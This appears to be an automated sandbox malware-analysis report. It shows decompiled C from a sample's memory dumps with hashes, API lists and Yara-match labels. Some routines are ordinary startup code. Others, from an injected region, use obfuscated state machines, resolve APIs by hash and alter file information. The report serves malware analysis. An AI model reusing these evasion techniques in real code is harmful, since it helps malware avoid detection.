                                            • Opcode Fuzzy Hash: 1c2b2a8c3210c0b2accbef479441618437f9ec0a63e185d060dbafee3c567305
                                            • Instruction Fuzzy Hash: 29610EB2F303015BDB16AAF8A85472E72E6AB8C644F850479F845DF25CDB74CD1087C2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 404 425ff1-4260a2 GetVersion 406 4260b6-4260b8 call 4171bc 404->406 407 4260a4-4260b3 GetProcessVersion 404->407 409 4260bd-4260fd call 417178 LoadCursorA * 2 406->409 407->406
                                            C-Code - Quality: 90%
                                            			E00425FF1() {
                                            				unsigned int _t18;
                                            				intOrPtr _t19;
                                            				intOrPtr _t26;
                                            				long _t28;
                                            				void* _t40;
                                            				void* _t50;
                                            
                                            				_t50 = 0x439be0;
                                            				_t18 = GetVersion();
                                            				 *0x00439C34 = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
                                            				 *0x00439C38 = _t18 >> 0x1f;
                                            				asm("sbb eax, eax");
                                            				_t40 = 1;
                                            				_t19 = _t18 + 1;
                                            				 *0x00439C3C = _t19;
                                            				 *0x00439C40 = _t40 - _t19;
                                            				 *0x00439C44 = _t19;
                                            				 *0x00439C48 = 0;
                                            				if(_t19 != 0) {
                                            					_t28 = GetProcessVersion(0); // executed
                                            					asm("sbb eax, eax");
                                            					 *((intOrPtr*)(0x439c48)) = _t28 + 1;
                                            				}
                                            				E004171BC(_t50);
                                            				 *((intOrPtr*)(_t50 + 0x24)) = 0;
                                            				E00417178(_t50);
                                            				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
                                            				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
                                            				 *((intOrPtr*)(_t50 + 0x50)) = 0;
                                            				 *((intOrPtr*)(_t50 + 0x44)) = 0;
                                            				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
                                            				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
                                            				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
                                            				return _t50;
                                            			}










                                            APIs
                                            • GetVersion.KERNEL32(?,?,?,00425FEC), ref: 00426068
                                            • GetProcessVersion.KERNELBASE(00000000,?,?,?,00425FEC), ref: 004260A5
                                            • LoadCursorA.USER32 ref: 004260D3
                                            • LoadCursorA.USER32 ref: 004260DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CursorLoadVersion$Process
                                            • String ID:
                                            • API String ID: 2246821583-0
                                            • Opcode ID: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
                                            • Instruction ID: b544fc3fc140862069c0e5c3025fa315675d99968a939774a25cb551b1266f67
                                            • Opcode Fuzzy Hash: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
                                            • Instruction Fuzzy Hash: 2C113AB1A047608FD728DF3A989452ABBE5FB48704751493FE18BC6B50D778A441CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 66%
                                            			E02238240(void* __ebx, void* __ebp) {
                                            				short _v524;
                                            				char _v564;
                                            				char _v572;
                                            				struct _SECURITY_ATTRIBUTES* _v576;
                                            				signed int _v580;
                                            				signed int _v584;
                                            				signed int _v588;
                                            				signed int _v592;
                                            				intOrPtr _v596;
                                            				intOrPtr* _t86;
                                            				intOrPtr* _t88;
                                            				void* _t100;
                                            				void* _t101;
                                            				intOrPtr* _t103;
                                            				intOrPtr* _t106;
                                            				void* _t108;
                                            				void* _t109;
                                            				void* _t110;
                                            				void* _t111;
                                            				void* _t112;
                                            				unsigned int _t138;
                                            				void* _t140;
                                            				void* _t141;
                                            				signed int _t142;
                                            				intOrPtr _t144;
                                            				void* _t145;
                                            				void* _t148;
                                            
                                            				_t145 = __ebp;
                                            				_t112 = __ebx;
                                            				_v592 = 0xe2e3;
                                            				_v592 = _v592 ^ 0xd0dd7a16;
                                            				_t142 = 0x20540118;
                                            				_v592 = _v592 * 0x3d;
                                            				_v592 = _v592 | 0xc45f2d48;
                                            				_v592 = _v592 + 0xffffa838;
                                            				_v592 = _v592 + 0xde6b;
                                            				_v592 = _v592 ^ 0xf67dff2c;
                                            				_v592 = _v592 + _v592 * 4 << 2;
                                            				_v592 = _v592 ^ 0xf4577600;
                                            				_v584 = 0xc2f;
                                            				_v584 = _v584 << 0xb;
                                            				_v584 = _v584 * 0x17;
                                            				_v584 = _v584 >> 8;
                                            				_v584 = _v584 ^ 0x0008c1c9;
                                            				_v580 = 0xfdf2;
                                            				_v580 = _v580 << 7;
                                            				_v580 = _v580 ^ 0x007ef903;
                                            				_v588 = 0xe94a;
                                            				_v588 = _v588 ^ 0xa24bbed7;
                                            				_v588 = _v588 | 0x3a5f93cf;
                                            				_t113 = _v588;
                                            				_t141 = _v580;
                                            				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
                                            				_v588 = _v588 | 0xa489ddc5;
                                            				_v588 = _v588 + 0xf775;
                                            				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
                                            				_v588 = _t138;
                                            				_v588 = _v588 ^ 0x0235bf01;
                                            				while(1) {
                                            					L1:
                                            					_t148 = _t142 - 0x17c5ef14;
                                            					if(_t148 > 0) {
                                            						break;
                                            					}
                                            					if(_t148 == 0) {
                                            						_t86 =  *0x223dfec;
                                            						__eflags = _t86;
                                            						if(_t86 == 0) {
                                            							_t111 = E02233F20(0xbb398380);
                                            							_t138 = 0xd4fa8936;
                                            							_t86 = E02233E80(_t112, _t111, 0xd4fa8936, _t145);
                                            							 *0x223dfec = _t86;
                                            						}
                                            						 *_t86( &_v572);
                                            						_t142 = 0x2295af4;
                                            						continue;
                                            					} else {
                                            						if(_t142 == 0xa7036f) {
                                            							_t88 =  *0x223de58;
                                            							__eflags = _t88;
                                            							if(_t88 == 0) {
                                            								_t110 = E02233F20(0xbb398380);
                                            								_t138 = 0xb1aefb5;
                                            								_t88 = E02233E80(_t112, _t110, 0xb1aefb5, _t145);
                                            								 *0x223de58 = _t88;
                                            							}
                                            							 *_t88(0,  &_v524, 0x104);
                                            							_t142 = 0xfef53a6;
                                            							continue;
                                            						} else {
                                            							if(_t142 == 0x2295af4) {
                                            								_v580 = 0xa8c00;
                                            								_v576 = 0;
                                            								_v596 = E0223B590(_v580, _v576, 0x989680, 0);
                                            								_v592 = _t138;
                                            								_t140 = _v588 - _v564;
                                            								_t144 = _v596;
                                            								asm("sbb ecx, [esp+0x3c]");
                                            								__eflags = _v584 - _v592;
                                            								if(__eflags < 0) {
                                            									goto L24;
                                            								} else {
                                            									if(__eflags > 0) {
                                            										L29:
                                            										return 1;
                                            									} else {
                                            										__eflags = _t140 - _t144;
                                            										if(_t140 < _t144) {
                                            											goto L24;
                                            										} else {
                                            											goto L29;
                                            										}
                                            									}
                                            								}
                                            							} else {
                                            								if(_t142 != 0xfef53a6) {
                                            									L23:
                                            									__eflags = _t142 - 0x2ffd856e;
                                            									if(_t142 != 0x2ffd856e) {
                                            										continue;
                                            									} else {
                                            										goto L24;
                                            									}
                                            								} else {
                                            									if( *0x223dfbc == 0) {
                                            										_t101 = E02233F20(0xbb398380);
                                            										_t138 = 0xc0be2284;
                                            										 *0x223dfbc = E02233E80(_t112, _t101, 0xc0be2284, _t145);
                                            									}
                                            									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
                                            									_t141 = _t100;
                                            									if(_t141 == 0xffffffff) {
                                            										L24:
                                            										__eflags = 0;
                                            										return 0;
                                            									} else {
                                            										_t142 = 0x28eddbc7;
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            					L30:
                                            				}
                                            				__eflags = _t142 - 0x20540118;
                                            				if(_t142 == 0x20540118) {
                                            					_t142 = 0xa7036f;
                                            					goto L1;
                                            				} else {
                                            					__eflags = _t142 - 0x28eddbc7;
                                            					if(_t142 == 0x28eddbc7) {
                                            						_t103 =  *0x223e1e4;
                                            						__eflags = _t103;
                                            						if(_t103 == 0) {
                                            							_t109 = E02233F20(0xbb398380);
                                            							_t138 = 0xfddf2477;
                                            							_t103 = E02233E80(_t112, _t109, 0xfddf2477, _t145);
                                            							 *0x223e1e4 = _t103;
                                            						}
                                            						 *_t103(_t141, 0,  &_v564, 0x28);
                                            						asm("sbb esi, esi");
                                            						_t106 =  *0x223dc70;
                                            						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
                                            						__eflags = _t106;
                                            						if(_t106 == 0) {
                                            							_t108 = E02233F20(0xbb398380);
                                            							_t138 = 0x560d239b;
                                            							_t106 = E02233E80(_t112, _t108, 0x560d239b, _t145);
                                            							 *0x223dc70 = _t106;
                                            						}
                                            						 *_t106(_t141);
                                            					}
                                            					goto L23;
                                            				}
                                            				goto L30;
                                            			}

                                            APIs
                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 022383A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: J
                                            • API String ID: 823142352-2715717022
                                            • Opcode ID: dc04e8415f8b403b2db57900e774afde47804ba0af262eab940fd3d3e61ed8c2
                                            • Instruction ID: 046fc3dc4dde37c9fd8800998cf9e95323985028582ccfc22bde7e6b40b044dc
                                            • Opcode Fuzzy Hash: dc04e8415f8b403b2db57900e774afde47804ba0af262eab940fd3d3e61ed8c2
                                            • Instruction Fuzzy Hash: CE61ADB2A283019BC709DFA8D484A2FB7E6ABC4754F04891DF495DB298D774C9098BD3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E022342F0(void* __ebx, long __ecx) {
                                            				intOrPtr* _t1;
                                            				void* _t4;
                                            				void* _t16;
                                            				long _t17;
                                            				void* _t18;
                                            
                                            				_t8 = __ebx;
                                            				_t1 =  *0x223dea8;
                                            				_t17 = __ecx;
                                            				if(_t1 == 0) {
                                            					_t1 = E02233E80(__ebx, E02233F20(0xbb398380), 0x97f883e, _t18);
                                            					 *0x223dea8 = _t1;
                                            				}
                                            				_t16 =  *_t1();
                                            				if( *0x223dcec == 0) {
                                            					 *0x223dcec = E02233E80(_t8, E02233F20(0xbb398380), 0xe9233692, _t18);
                                            				}
                                            				_t4 = RtlAllocateHeap(_t16, 8, _t17); // executed
                                            				return _t4;
                                            			}

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 02234344
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 4ea84e08adada8ab621872a34a5346ba314854720047554f852def73907b6ff2
                                            • Instruction ID: 296b42382ff2aefb50094ea54d7991c034f64f022902fbde112176804e9fbc5f
                                            • Opcode Fuzzy Hash: 4ea84e08adada8ab621872a34a5346ba314854720047554f852def73907b6ff2
                                            • Instruction Fuzzy Hash: B3E065B6B613026BDB15F6F5745866B25EBABC0A8135448A9F401CB348EE748D014BD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00409C36() {
                                            				_Unknown_base(*)()* _t1;
                                            
                                            				_t1 = SetUnhandledExceptionFilter(E00409BF0); // executed
                                            				 *0x439edc = _t1;
                                            				return _t1;
                                            			}

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00009BF0), ref: 00409C3B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
                                            • Instruction ID: b3cfb7864018c3ddb187660085869e9baaa6efe3d8831d09aec10079f1b62131
                                            • Opcode Fuzzy Hash: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
                                            • Instruction Fuzzy Hash: BCA022B02003808FCB20AF20BC3A0203B30F2003A23000032E000802F2EBF02880EF0C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 100%
                                            			E0042592B() {
                                            				void* __ecx;
                                            				void* __ebp;
                                            				struct _CRITICAL_SECTION* _t36;
                                            				void* _t37;
                                            				struct _CRITICAL_SECTION* _t42;
                                            				signed char* _t58;
                                            				void* _t61;
                                            				void* _t63;
                                            				void* _t65;
                                            				signed int _t70;
                                            				void* _t71;
                                            				intOrPtr _t72;
                                            				signed int _t73;
                                            				void* _t74;
                                            
                                            				_t71 = _t65;
                                            				_t1 = _t71 + 0x1c; // 0x4399c8
                                            				_t36 = _t1;
                                            				 *(_t74 + 0x14) = _t36;
                                            				EnterCriticalSection(_t36);
                                            				_t3 = _t71 + 4; // 0x20
                                            				_t72 =  *_t3;
                                            				_t4 = _t71 + 8; // 0x4
                                            				_t70 =  *_t4;
                                            				if(_t70 >= _t72) {
                                            					L2:
                                            					_t70 = 1;
                                            					if(_t72 <= _t70) {
                                            						L7:
                                            						_t13 = _t71 + 0x10; // 0x6a00e0
                                            						_t37 =  *_t13;
                                            						_t73 = _t72 + 0x20;
                                            						if(_t37 != 0) {
                                            							_t61 = GlobalHandle(_t37);
                                            							GlobalUnlock(_t61);
                                            							_t42 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
                                            						} else {
                                            							_t42 = GlobalAlloc(0x2002, _t73 << 3); // executed
                                            						}
                                            						 *(_t74 + 0x10) = _t42;
                                            						if(_t42 == 0) {
                                            							_t15 = _t71 + 0x10; // 0x6a00e0
                                            							GlobalLock(GlobalHandle( *_t15));
                                            							_t16 = _t74 + 0x14; // 0x406468
                                            							LeaveCriticalSection( *_t16);
                                            							E0041007F(_t65);
                                            						}
                                            						_t63 = GlobalLock( *(_t74 + 0x10));
                                            						_t18 = _t71 + 4; // 0x20
                                            						E00406330(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
                                            						_t74 = _t74 + 0xc;
                                            						 *(_t71 + 0x10) = _t63;
                                            						 *(_t71 + 4) = _t73;
                                            					} else {
                                            						_t10 = _t71 + 0x10; // 0x6a00e0
                                            						_t58 =  *_t10 + 8;
                                            						while(( *_t58 & 0x00000001) != 0) {
                                            							_t70 = _t70 + 1;
                                            							_t58 =  &(_t58[8]);
                                            							if(_t70 < _t72) {
                                            								continue;
                                            							}
                                            							break;
                                            						}
                                            						if(_t70 >= _t72) {
                                            							goto L7;
                                            						}
                                            					}
                                            				} else {
                                            					_t5 = _t71 + 0x10; // 0x6a00e0
                                            					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
                                            						goto L2;
                                            					}
                                            				}
                                            				_t23 = _t71 + 0xc; // 0x4
                                            				if(_t70 >=  *_t23) {
                                            					_t24 = _t70 + 1; // 0x5
                                            					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
                                            				}
                                            				_t26 = _t71 + 0x10; // 0x6a00e0
                                            				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
                                            				_t34 = _t70 + 1; // 0x5
                                            				 *(_t71 + 8) = _t34;
                                            				LeaveCriticalSection( *(_t74 + 0x10));
                                            				return _t70;
                                            			}


















                                            APIs
                                            • EnterCriticalSection.KERNEL32(004399C8,004397CC,00000000,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042593A
                                            • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042598F
                                            • GlobalHandle.KERNEL32 ref: 00425998
                                            • GlobalUnlock.KERNEL32(00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259A1
                                            • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004259B3
                                            • GlobalHandle.KERNEL32 ref: 004259CA
                                            • GlobalLock.KERNEL32 ref: 004259D1
                                            • LeaveCriticalSection.KERNEL32(hd@,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259D7
                                            • GlobalLock.KERNEL32 ref: 004259E6
                                            • LeaveCriticalSection.KERNEL32(?), ref: 00425A2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                            • String ID: hd@
                                            • API String ID: 2667261700-3469257913
                                            • Opcode ID: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
                                            • Instruction ID: 9ab521ae17bdcbf38e6808dd3f3d9ead1f2f8e9119152a2daa84f5c479dd3fff
                                            • Opcode Fuzzy Hash: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
                                            • Instruction Fuzzy Hash: C83181B1304709DFD7249F28EC89A2BB7E8FB44314B404A6EE892D3661D775F845CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            [Control-flow graph image not reproduced. Legend: executed / not executed nodes. Call nodes labelled in the graph: CreateFileW, SetFileInformationByHandle.]
                                            C-Code - Quality: 66%
                                            			E02237EC0() {
                                            				short _v524;
                                            				struct _SECURITY_ATTRIBUTES* _v532;
                                            				intOrPtr _v536;
                                            				intOrPtr _v540;
                                            				intOrPtr _v544;
                                            				intOrPtr _v548;
                                            				intOrPtr _v552;
                                            				intOrPtr _v556;
                                            				intOrPtr _v560;
                                            				char _v564;
                                            				intOrPtr _v568;
                                            				char _v572;
                                            				struct _SECURITY_ATTRIBUTES* _v576;
                                            				intOrPtr _v580;
                                            				signed int _v584;
                                            				signed int _v588;
                                            				signed int _v592;
                                            				signed int _v596;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t91;
                                            				void* _t93;
                                            				intOrPtr* _t95;
                                            				void* _t97;
                                            				intOrPtr* _t102;
                                            				intOrPtr* _t104;
                                            				intOrPtr* _t109;
                                            				intOrPtr _t113;
                                            				intOrPtr* _t114;
                                            				void* _t116;
                                            				void* _t117;
                                            				void* _t118;
                                            				void* _t121;
                                            				void* _t122;
                                            				void* _t123;
                                            				char _t131;
                                            				intOrPtr _t136;
                                            				unsigned int _t150;
                                            				void* _t153;
                                            				void* _t160;
                                            				void* _t161;
                                            				signed int* _t162;
                                            				void* _t164;
                                            
                                            				_t162 =  &_v596;
                                            				_v592 = 0x7beb;
                                            				_t123 = 0x139d8b99;
                                            				_v592 = _v592 | 0x6fda154b;
                                            				_v592 = _v592 + 0xf6a9;
                                            				_v592 = _v592 << 0x10;
                                            				_v592 = _v592 + 0xffffa540;
                                            				_v592 = _v592 ^ 0x7693a440;
                                            				_v588 = 0xc2f;
                                            				_v588 = _v588 << 0xb;
                                            				_t122 = 0;
                                            				_v588 = _v588 * 0x17;
                                            				_v588 = _v588 >> 8;
                                            				_v588 = _v588 ^ 0x0008c1c9;
                                            				_v584 = 0xfdf2;
                                            				_v584 = _v584 << 7;
                                            				_v584 = _v584 ^ 0x007ef903;
                                            				_v596 = 0xe94a;
                                            				_v596 = _v596 ^ 0xa24bbed7;
                                            				_v596 = _v596 | 0x3a5f93cf;
                                            				_t154 = _v596;
                                            				_t161 = _v584;
                                            				_v596 = (_v596 - (0x2c9fb4d9 * _t154 >> 0x20) >> 1) + (0x2c9fb4d9 * _t154 >> 0x20) >> 6;
                                            				_v596 = _v596 | 0xa489ddc5;
                                            				_v596 = _v596 + 0xf775;
                                            				_t150 = 0x1b4e81b5 * _v596 >> 0x20 >> 3;
                                            				_v596 = _t150;
                                            				_v596 = _v596 ^ 0x0235bf01;
                                            				while(1) {
                                            					L1:
                                            					goto L2;
                                            					do {
                                            						while(1) {
                                            							L2:
                                            							_t164 = _t123 - 0x1e3debbe;
                                            							if(_t164 > 0) {
                                            								break;
                                            							}
                                            							if(_t164 == 0) {
                                            								_t97 = E022334C0(0x223d910);
                                            								_t150 =  *0x223dc60;
                                            								_t160 = _t97;
                                            								if(_t150 == 0) {
                                            									_t150 = E02233E80(_t122, E02233F20(0xe66945e6), 0xcca28b0d, _t161);
                                            									 *0x223dc60 = _t150;
                                            								}
                                            								_t136 =  *0x223e2ec;
                                            								 *_t150( &_v524, 0x104, _t160, _t136 + 0x5c, _t136 + 0x278);
                                            								_t102 =  *0x223dea8;
                                            								_t162 =  &(_t162[5]);
                                            								if(_t102 == 0) {
                                            									_t118 = E02233F20(0xbb398380);
                                            									_t150 = 0x97f883e;
                                            									_t102 = E02233E80(_t122, _t118, 0x97f883e, _t161);
                                            									 *0x223dea8 = _t102;
                                            								}
                                            								_t153 =  *_t102();
                                            								_t104 =  *0x223e1a0;
                                            								if(_t104 == 0) {
                                            									_t117 = E02233F20(0xbb398380);
                                            									_t150 = 0x26c3f343;
                                            									_t104 = E02233E80(_t122, _t117, 0x26c3f343, _t161);
                                            									 *0x223e1a0 = _t104;
                                            								}
                                            								 *_t104(_t153, 0, _t160);
                                            								_t123 = 0x2eb48bb5;
                                            								goto L1;
                                            							} else {
                                            								if(_t123 == 0x390f515) {
                                            									_v580 = 0xa8c00;
                                            									_v576 = 0;
                                            									_v596 = E0223B590(_v580, _v576, 0x989680, 0);
                                            									_v592 = _t150;
                                            									_v588 = _v588 - _v596;
                                            									asm("sbb [esp+0x2c], ecx");
                                            									_t123 = 0x1e3debbe;
                                            									continue;
                                            								} else {
                                            									if(_t123 == 0x74c3147) {
                                            										_t109 =  *0x223dc70;
                                            										if(_t109 == 0) {
                                            											_t109 = E02233E80(_t122, E02233F20(0xbb398380), 0x560d239b, _t161);
                                            											 *0x223dc70 = _t109;
                                            										}
                                            										 *_t109(_t161);
                                            										L34:
                                            										return _t122;
                                            									} else {
                                            										if(_t123 != 0x139d8b99) {
                                            											goto L22;
                                            										} else {
                                            											_t123 = 0x31fe4006;
                                            											continue;
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L35:
                                            						}
                                            						if(_t123 == 0x2eb48bb5) {
                                            							if( *0x223dfbc == 0) {
                                            								_t93 = E02233F20(0xbb398380);
                                            								_t150 = 0xc0be2284;
                                            								 *0x223dfbc = E02233E80(_t122, _t93, 0xc0be2284, _t161);
                                            							}
                                            							_t91 = CreateFileW( &_v524, _v592, _v588, 0, _v584, _v596, 0); // executed
                                            							_t161 = _t91;
                                            							if(_t161 == 0xffffffff) {
                                            								goto L34;
                                            							} else {
                                            								_t123 = 0x3a4d3f65;
                                            								goto L2;
                                            							}
                                            						} else {
                                            							if(_t123 == 0x31fe4006) {
                                            								_t95 =  *0x223dfec;
                                            								if(_t95 == 0) {
                                            									_t121 = E02233F20(0xbb398380);
                                            									_t150 = 0xd4fa8936;
                                            									_t95 = E02233E80(_t122, _t121, 0xd4fa8936, _t161);
                                            									 *0x223dfec = _t95;
                                            								}
                                            								 *_t95( &_v572);
                                            								_t123 = 0x390f515;
                                            								goto L2;
                                            							} else {
                                            								if(_t123 != 0x3a4d3f65) {
                                            									goto L22;
                                            								} else {
                                            									_t113 = _v568;
                                            									_t131 = _v572;
                                            									_v560 = _t113;
                                            									_v552 = _t113;
                                            									_v544 = _t113;
                                            									_v536 = _t113;
                                            									_t114 =  *0x223df54;
                                            									_v564 = _t131;
                                            									_v556 = _t131;
                                            									_v548 = _t131;
                                            									_v540 = _t131;
                                            									_v532 = 0;
                                            									if(_t114 == 0) {
                                            										_t116 = E02233F20(0xbb398380);
                                            										_t150 = 0x3d270e76;
                                            										_t114 = E02233E80(_t122, _t116, 0x3d270e76, _t161);
                                            										 *0x223df54 = _t114;
                                            									}
                                            									 *_t114(_t161, 0,  &_v564, 0x28); // executed
                                            									_t123 = 0x74c3147;
                                            									_t122 =  !=  ? 1 : _t122;
                                            									goto L2;
                                            								}
                                            							}
                                            						}
                                            						goto L35;
                                            						L22:
                                            					} while (_t123 != 0x21420c30);
                                            					return _t122;
                                            					goto L35;
                                            				}
                                            			}















































                                            APIs
                                            • SetFileInformationByHandle.KERNELBASE(007EF903,00000000,?,00000028), ref: 02238149
                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000), ref: 022381ED
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreateHandleInformation
                                            • String ID: J$e?M:$e?M:$Ei${
                                            • API String ID: 3667790775-2299002149
                                            • Opcode ID: dc67a909832748e3640bac90cbd2579213ab096e5f993dec6094df8410dae01b
                                            • Instruction ID: d57d0373b525ab6045a60ed935b2befa2aef531a9fc61ea6449958a1c718d36e
                                            • Opcode Fuzzy Hash: dc67a909832748e3640bac90cbd2579213ab096e5f993dec6094df8410dae01b
                                            • Instruction Fuzzy Hash: E381C2B1A183019FC719DFA4A49462BB6E6BBC4748F000D2DF556CB258EB74D9048FD3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 100%
                                            			E004171BC(void* __ecx) {
                                            				int _t6;
                                            				struct HDC__* _t17;
                                            				void* _t18;
                                            
                                            				_t18 = __ecx;
                                            				_t6 = GetSystemMetrics(0xb); // executed
                                            				 *((intOrPtr*)(_t18 + 8)) = _t6;
                                            				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
                                            				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
                                            					E00426041();
                                            				} else {
                                            					E00426011();
                                            				}
                                            				_t17 = GetDC(0);
                                            				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
                                            				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
                                            				return ReleaseDC(0, _t17);
                                            			}







                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL ref: 004171C9
                                            • GetSystemMetrics.USER32 ref: 004171D0
                                            • GetDC.USER32(00000000), ref: 004171E9
                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 004171FA
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00417202
                                            • ReleaseDC.USER32 ref: 0041720A
                                              • Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 00426023
